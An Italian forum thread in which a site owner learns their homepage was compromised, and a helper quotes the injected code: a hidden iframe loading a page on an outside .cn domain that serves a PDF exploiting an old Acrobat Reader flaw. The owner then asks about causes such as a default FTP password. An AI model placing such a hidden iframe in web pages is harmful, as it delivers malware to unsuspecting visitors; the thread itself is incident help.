E appunto!! Quello che non capisco è proprio questo! Come è possibile che qualcuno abbia potuto modificare la homepage?Originariamente inviato da Habanero
Ho reso non cliccabile il link perchè il pdf in questione contiene un exploit che cerca di sfruttare una vulnerabilità di acrobat reader (non vulnerabile solo dalla versione 8.1.2 e successivi) per eseguire codice sulla macchima.
Lo script nel tuo sito scrive nella pagina il seguente codice:
Un iframe nascosto che carica la pagina che poi esegue materialmente il download del pdf.codice:<div style="visibility:hidden"> <iframe src="http://chanchoi.cn/index.php" visibility:hidden width=100 height=80></iframe> </div>
Dovresti cercare di capire come è stata possibile l'iniezione nella tua home page per evitare che questo succeda nuovamente..
Dove potrebbe stare la causa? C'è qualcosa che non va nel sito o è un problema del server su cui è ospitato?
Io accedo via ftp per caricare i files e la password è abbastanza sicura... è quella che mi è stata assegnatadi default e che non ho mai modificato.. anzi non se nemmeno se si può modificare...Non saprei proprio da che parte indagare per scoprire...
Sul pannello di controllo del dominio non ho fatto alcuna modifica, unica novità è che di recente ho chiesto l'attivazione del supporto php per mettere un form di invio mail. Che sia legato in qualche modo a questo? Forse è colpa del form in php?
Ah dimenticavo.. chiedo scusa per aver messo un link nocivo... non era mia intenzione creare danni! Anzi, putroppo io ho scaricato ed aperto il pdf e apparentemenete non è successo nulla (almeno spero...)
Ma che genere di scherzetto è? Mi sono preso un virus e non me ne sono accorto?
E' una cosa che accade spesso ai siti web o è una condizione anomala? Scusate l'ignoranza e l'inesperienza e grazie per l'aiuto.
Rispondi quotando